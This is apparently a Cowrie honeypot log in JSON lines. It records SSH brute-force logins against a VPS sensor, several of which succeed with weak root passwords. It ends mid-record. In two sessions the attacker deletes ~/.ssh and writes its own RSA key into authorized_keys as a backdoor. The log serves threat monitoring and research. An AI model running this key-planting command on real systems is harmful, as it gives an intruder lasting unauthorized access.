["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:44:50.778899Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer2024","message":"login attempt [root/Qwer2024] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.039042Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:44:51.172541Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.173394Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.174832Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.250148Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:44:51.450806Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.451540Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.513720Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.514579Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11800,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0c69a9e97e2","protocol":"ssh","message":"New connection: 185.152.45.241:11800 (1.2.3.4:22) [session: b0c69a9e97e2]","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.559535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.560388Z","src_ip":"185.152.45.241","session":"b0c69a9e97e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.613846Z","src_ip":"185.152.45.241","session":"b0c69a9e97e2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:44:51.888866Z","src_ip":"185.152.45.241","session":"b0c69a9e97e2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:44:52.943982Z","src_ip":"185.152.45.241","session":"b0c69a9e97e2"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11801,"dst_ip":"1.2.3.4","dst_port":22,"session":"b58cbcb862c0","protocol":"ssh","message":"New connection: 185.152.45.241:11801 (1.2.3.4:22) [session: b58cbcb862c0]","sensor":"my-vps","timestamp":"2025-09-09T02:44:53.003698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:44:53.013540Z","src_ip":"185.152.45.241","session":"b58cbcb862c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:44:53.062948Z","src_ip":"185.152.45.241","session":"b58cbcb862c0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:44:53.273875Z","src_ip":"185.152.45.241","session":"b58cbcb862c0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:44:53.323287Z","src_ip":"185.152.45.241","session":"9557dcd5d6fc"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:44:53.328080Z","src_ip":"185.152.45.241","session":"b58cbcb862c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60540,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cb77b4bd717","protocol":"ssh","message":"New connection: 212.227.235.229:60540 (1.2.3.4:22) [session: 5cb77b4bd717]","sensor":"my-vps","timestamp":"2025-09-09T02:45:56.692133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:45:56.700601Z","src_ip":"212.227.235.229","session":"5cb77b4bd717"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:45:57.075879Z","src_ip":"212.227.235.229","session":"5cb77b4bd717"}
{"eventid":"cowrie.login.failed","username":"jira","password":"1234567","message":"login attempt [jira/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T02:45:58.581656Z","src_ip":"212.227.235.229","session":"5cb77b4bd717"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:45:59.959219Z","src_ip":"212.227.235.229","session":"5cb77b4bd717"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11777,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc4a0f8e6a7d","protocol":"ssh","message":"New connection: 185.152.45.241:11777 (1.2.3.4:22) [session: cc4a0f8e6a7d]","sensor":"my-vps","timestamp":"2025-09-09T02:46:05.650726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:46:05.651964Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:46:05.720695Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.login.success","username":"root","password":"windows123","message":"login attempt [root/windows123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:46:05.985084Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:46:06.101382Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.102039Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.103290Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.403831Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:46:06.612266Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.612976Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.675657Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.676510Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11808,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbdb48e35f3b","protocol":"ssh","message":"New connection: 185.152.45.241:11808 (1.2.3.4:22) [session: cbdb48e35f3b]","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.725061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.726216Z","src_ip":"185.152.45.241","session":"cbdb48e35f3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.768317Z","src_ip":"185.152.45.241","session":"cbdb48e35f3b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:46:06.998611Z","src_ip":"185.152.45.241","session":"cbdb48e35f3b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:46:08.048697Z","src_ip":"185.152.45.241","session":"cbdb48e35f3b"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11809,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6aaae5a2ae4","protocol":"ssh","message":"New connection: 185.152.45.241:11809 (1.2.3.4:22) [session: c6aaae5a2ae4]","sensor":"my-vps","timestamp":"2025-09-09T02:46:08.088776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:46:08.089521Z","src_ip":"185.152.45.241","session":"c6aaae5a2ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:46:08.133497Z","src_ip":"185.152.45.241","session":"c6aaae5a2ae4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:46:08.358501Z","src_ip":"185.152.45.241","session":"c6aaae5a2ae4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:46:08.399570Z","src_ip":"185.152.45.241","session":"cc4a0f8e6a7d"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:46:08.403795Z","src_ip":"185.152.45.241","session":"c6aaae5a2ae4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45948,"dst_ip":"1.2.3.4","dst_port":23,"session":"1d78f9f74f63","protocol":"telnet","message":"New connection: 212.227.125.160:45948 (1.2.3.4:23) [session: 1d78f9f74f63]","sensor":"my-vps","timestamp":"2025-09-09T02:46:08.718496Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28185,"dst_ip":"1.2.3.4","dst_port":22,"session":"8beff54882c0","protocol":"ssh","message":"New connection: 212.227.235.229:28185 (1.2.3.4:22) [session: 8beff54882c0]","sensor":"my-vps","timestamp":"2025-09-09T02:46:14.251439Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:46:14.252508Z","src_ip":"212.227.235.229","session":"8beff54882c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28545,"dst_ip":"1.2.3.4","dst_port":22,"session":"95610c3be02c","protocol":"ssh","message":"New connection: 212.227.235.229:28545 (1.2.3.4:22) [session: 95610c3be02c]","sensor":"my-vps","timestamp":"2025-09-09T02:46:14.364094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:46:14.364960Z","src_ip":"212.227.235.229","session":"95610c3be02c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh